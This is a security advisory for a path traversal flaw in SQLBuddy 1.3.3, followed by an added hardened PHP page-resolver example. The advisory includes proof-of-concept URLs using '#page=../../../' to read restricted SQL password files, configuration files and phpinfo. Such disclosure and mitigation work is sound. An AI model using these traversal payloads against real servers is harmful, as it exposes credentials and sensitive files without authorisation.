
SQLBuddy 1.3.3 Path Traversal

Reported: 15 May 2015 by hyp3rlinx
Type: packetstorm
Source: packetstormsecurity.com

SQLBuddy 1.3.3 Path Traversal vulnerability allows directory traversal to access sensitive files and directories.

Code
```text
# Exploit Title: Path traversal vulnerability
# Google Dork: intitle:path traversal
# Date: 05-08-2015
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org/
# Vendor Homepage: http://www.sqlbuddy.com
# Software Link: http://www.sqlbuddy.com
# Version: 1.3.3
# Tested on: windows 7
# Category: webapps

Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt


Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about
directories and read any PHP and non-PHP files by appending
the '#' hash character when requesting files via URLs.

e.g. .doc, .txt, .xml, .conf, .sql etc...

After adding the '#' character as a delimiter, any non-PHP file will be returned
and rendered, subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via the POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>


POC exploit payloads:
=======================

1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo


Severity Level:
===============
High


Request Method(s):
[+] POST

Vulnerable Product:
[+] sqlbuddy 1.3.3

Vulnerable Parameter(s):
[+] #page=somefile

Affected Area(s):
[+] Server directories & sensitive files


Disclaimer:
=========================
The information provided in this advisory is provided as it is without any
warranty. The security research reporter John Page disclaims all
warranties, either expressed or implied, including the warranties of
merchantability and capability for a particular purpose. apparitionsec or
its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits or special
damages.
```
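The root cause the advisory describes is a page name taken from the request, concatenated with `.php`, and used to load a file; the fix a maintainer wants is to never build a filesystem path from the request at all. The following is an added example, not SQLBuddy's code or the advisory author's: a PHP page resolver that allowlists page names, rejects anything that is not a bare identifier (so `../`, `#`, null bytes and extension tricks are refused before any path exists), and then confirms the resolved file still lies under the pages directory. The function name `resolve_page`, the `$pagesDir` argument and the allowlist entries are assumptions for the example.

```php
<?php
// Added example (not SQLBuddy's code): hardened resolution of a user-supplied
// "page" name before it is included. Assumes the pages live under a fixed
// directory $pagesDir and are referred to by bare names without an extension.

/**
 * Resolve a requested page name to a file path inside $pagesDir, or return
 * null if the request does not name a known page. The request value is only
 * ever compared against an allowlist; it never contributes path characters.
 */
function resolve_page(string $pagesDir, string $requested): ?string
{
    // 1. Allowlist of page names the application actually serves
    //    (constructed for this example; not SQLBuddy's real page list).
    static $allowed = ['home', 'browse', 'query', 'export'];

    // 2. Refuse anything that is not a bare identifier. This stops '../',
    //    '#', '%00', slashes and '.conf'-style suffixes before a path is built.
    if (!preg_match('/\A[a-z0-9_]+\z/', $requested)) {
        return null;
    }
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    // 3. Build the path server-side and verify, after symlink and '..'
    //    resolution, that it is still under $pagesDir. Defence in depth in
    //    case the allowlist is later edited carelessly.
    $base = realpath($pagesDir);
    $candidate = realpath($pagesDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Usage: the page name arrives in the POST body (the advisory's '#page=' value
// is forwarded by the client-side script). Every payload in the advisory,
// e.g. '../../../restricted/user_pwd.sql#', fails step 2 and yields null.
$page = resolve_page(__DIR__ . '/pages', $_POST['page'] ?? 'home');
if ($page === null) {
    http_response_code(400);
    exit('Unknown page');
}
require $page;
```

The allowlist is the real control; the `realpath` containment check only exists so that a mistake in maintaining the list cannot reopen traversal. Logging the rejected `$_POST['page']` value at step 2 (without echoing it back to the client) gives operators a cheap detection signal for attempts like those in the advisory.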
